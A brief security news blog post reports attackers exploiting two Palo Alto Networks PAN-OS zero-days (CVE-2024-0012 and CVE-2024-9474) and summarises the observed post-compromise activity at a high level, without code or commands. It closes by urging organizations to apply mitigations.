Zero day exploited in Palo Alto Networks
- Ferdinent Fernandez
- Nov 25, 2024
- 2 min read
Updated: Nov 26, 2024
Palo Alto Networks devices compromised in latest attacks
Attackers have compromised around 2,000 Palo Alto Networks firewalls by leveraging the two recently patched zero-days (CVE-2024-0012 and CVE-2024-9474).Compromised devices are predominantly located in the US and India
Recently, Palo Alto Networks issued a warning about attackers exploiting a zero-day vulnerability to achieve remote code execution on affected devices. They recommended that administrators secure the devices’ management interfaces to mitigate potential risks
Around two weeks ago, Palo Alto Networks disclosed that two zero-day vulnerabilities were being actively exploited. The first, CVE-2024-0012, allows unauthorized access to vulnerable devices' management interfaces, while the second, CVE-2024-9474, lets attackers escalate privileges to root on compromised firewalls. Exploits have been observed where attackers deploy web shells on affected devices.
Security researchers from WatchTowr later analyzed how these vulnerabilities could be chained together, publishing a Nuclei template to help administrators identify affected devices. Despite this, attacks have persisted, and Palo Alto has warned of a potential escalation, stating with moderate to high confidence that a working exploit chain for these vulnerabilities is publicly available. Automated and manual scans have increased as third-party tools for exploitation have become widespread.
The vulnerabilities impact not only Palo Alto firewalls but also Panorama (firewall management) and WildFire (sandboxing) appliances running PAN-OS. Palo Alto Networks has been actively updating indicators of compromise (IoCs) and advising organizations to follow remediation guidelines outlined in their security advisories.
On November 22, Arctic Wolf researchers reported intrusions involving Palo Alto firewalls across multiple industries. The attacks began shortly after WatchTowr’s analysis was released and likely involved chaining CVE-2024-0012 and CVE-2024-9474 for initial access. Post-compromise activities included:
Downloading a Sliver command-and-control implant.
Stealing configuration files, along with passwd and shadow files.
Deploying obfuscated PHP web shells.
Installing the XMRig cryptocurrency miner.
Organizations using affected systems are urged to apply mitigation measures promptly to reduce the risk of further exploitation.
Comments